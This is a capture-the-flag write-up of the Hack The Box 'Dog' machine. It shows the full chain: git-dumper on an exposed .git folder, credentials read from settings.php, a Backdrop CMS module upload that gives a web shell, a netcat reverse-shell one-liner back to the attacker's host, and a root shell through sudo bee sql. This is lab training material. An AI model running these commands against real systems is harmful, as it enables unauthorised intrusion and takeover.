Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 09 Mar 2025
IP: 10.10.11.58

Enumeration & Initial Access

Nmap Scan Result

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDEJsqBRTZaxqvLcuvWuqOclXU1uxwUJv98W1TfLTgTYqIBzWAqQR7Y6fXBOUS6FQ9xctARWGM3w3AeDw+MW0j+iH83gc9J4mTFTBP8bXMgRqS2MtoeNgKWozPoy6wQjuRSUammW772o8rsU2lFPq3fJCoPgiC7dR4qmrWvgp5TV8GuExl7WugH6/cTGrjoqezALwRlKsDgmAl6TkAaWbCC1rQ244m58ymadXaAx5I5NuvCxbVtw32/eEuyqu+bnW8V2SdTTtLCNOe1Tq0XJz3mG9rw8oFH+Mqr142h81jKzyPO/YrbqZi2GvOGF+PNxMg+4kWLQ559we+7mLIT7ms0esal5O6GqIVPax0K21+GblcyRBCCNkawzQCObo5rdvtELh0CPRkBkbOPo4CfXwd/DxMnijXzhR/lCLlb2bqYUMDxkfeMnmk8HRF+hbVQefbRC/+vWf61o2l0IFEr1IJo3BDtJy5m2IcWCeFX3ufk5Fme8LTzAsk6G9hROXnBZg8=
|   256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBM/NEdzq1MMEw7EsZsxWuDa+kSb+OmiGvYnPofRWZOOMhFgsGIWfg8KS4KiEUB2IjTtRovlVVot709BrZnCvU8Y=
|   256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPMpkoATGAIWQVbEl67rFecNZySrzt944Y/hWAyq4dPc
80/tcp open  http    syn-ack Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Home | Dog
| http-git:
|   10.10.11.58:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: todo: customize url aliases.  reference:https://docs.backdro...
|_http-favicon: Unknown favicon MD5: 3836E83A3E835A26D789DDA9E78C5510
| http-robots.txt: 22 disallowed entries
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
| /user/password /user/login /user/logout /?q=admin /?q=comment/reply
| /?q=filter/tips /?q=node/add /?q=search /?q=user/password
|_/?q=user/register /?q=user/login /?q=user/logout
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Open Ports: 22, 80

  • 22 – SSH

  • 80 – Backdrop CMS 1

After some reconnaissance, I identified that the web server is running Backdrop CMS 1, which is known to have a Remote Code Execution (RCE) vulnerability. A relevant exploit is available here:
🔗 Exploit-DB 52021

However, the exploit requires valid credentials

htb-dog1.png

.git Folder Discovery

Further enumeration revealed that the .git folder was accessible—something typically not meant to be public. This was discovered via the Nmap scan.

To dump the repository, I used git-dumper:

1
git-dumper http://10.10.11.58/.git/ ./dumped-repo
1
2
3
4
5
6
7
8
9
10
11
12
13
14
╰─❯ git-dumper http://10.10.11.58/.git .
Warning: Destination '.' is not empty
[-] Testing http://10.10.11.58/.git/HEAD [200]
[-] Testing http://10.10.11.58/.git/ [200]
[-] Fetching .git recursively
[-] Fetching http://10.10.11.58/.gitignore [404]
[-] http://10.10.11.58/.gitignore responded with status code 404
[-] Fetching http://10.10.11.58/.git/ [200]
[-] Fetching http://10.10.11.58/.git/objects/ff/f99b60388f8dabaa3ccb41a86ac100b29a75fa [200]
[-] Running git checkout .
Updated 2873 paths from the index

╰─❯ ls
core/  files/  index.php*  layouts/  LICENSE.txt*  README.md*  robots.txt*    settings.php*  sites/  themes/

Inside the dumped repository, I found sensitive credentials.

Credentials Found

  • Password (in settings.php):
    BackDropJ2024DS2024

  • Usernames (in update.settings.json):

    • tiffany@dog.htb

    • dog@dog.htb

After trying the credentials, I confirmed that the valid login was:
➡️ Username: tiffany
➡️ Password: BackDropJ2024DS2024

User Flag

https://www.exploit-db.com/exploits/52021 Download the exploit

1
2
3
4
5
6
╰─❯ python3 52021.py http://10.10.11.58/
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to http://10.10.11.58/?q=admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: http://10.10.11.58/modules/shell/shell.php

Compress the created files into the tar.gz

1
2
3
4
╰─❯ tar -czvf shell1.tar.gz shell/
shell/
shell/shell.info
shell/shell.php

Using the credentials, I authenticated and manually uploaded the malicious module archive (shell1.tar.gz) via: http://10.10.11.58/?q=admin/installer/manual

htb-dog2.png

After successful upload, I accessed the web shell: http://10.10.11.58/modules/shell/shell.php?cmd=id

htb-dog3.png

Then started a Netcat listener to catch the reverse shell.

1
curl 'http://10.10.11.58/modules/shell/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xxx 1234 >/tmp/f'
1
2
3
4
5
6
7
8
9
10
11
12
╰─❯ nc -lvvnkp 1234
listening on [any] 1234 ...
connect to [10.10.xxx.xxx] from (UNKNOWN) [10.10.11.58] 37612
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
shell-init: error retrieving current directory: getcwd: cannot access parent directories: No such file or directory 

www-data@dog:/var/www/html/modules/shell$ ls /home
ls /home
jobert  johncusack

With the shell, I found a local user: johncusack, and tested the credentials we found earlier.

1
2
3
4
5
6
7
8
9
10
11
╰─❯ ssh johncusack@10.10.11.58
The authenticity of host '10.10.11.58 (10.10.11.58)' can't be established.
ED25519 key fingerprint is SHA256:M3A+wMdtWP0tBPvp9OcRf6sPPmPmjfgNphodr912r1o.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.58' (ED25519) to the list of known hosts.
johncusack@10.10.11.58's password:

johncusack@dog:~$ cat user.txt
d158489555d5e3de8cc87xxxxxxxxxxxx

✅ Logged in successfully and obtained the user flag.

Root flag

Next, I noticed that johncusack could run the bee binary with sudo:

1
2
3
4
5
6
7
johncusack@dog:/var/www/html$ sudo -l
[sudo] password for johncusack:
Matching Defaults entries for johncusack on dog:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
    (ALL : ALL) /usr/local/bin/bee

Reference: Backdrop Bee Tool

The bee tool provides multiple ways to escalate privileges. I used the MySQL configuration method to gain a root shell.

htb-dog4.png

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
johncusack@dog:/var/www/html$ sudo /usr/local/bin/bee sql
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 14503
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> \! /bin/sh
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
83eee20657fc895f4f0exxxxxxxxxxxxxxxx

And finally…
🎉 Got the root flag!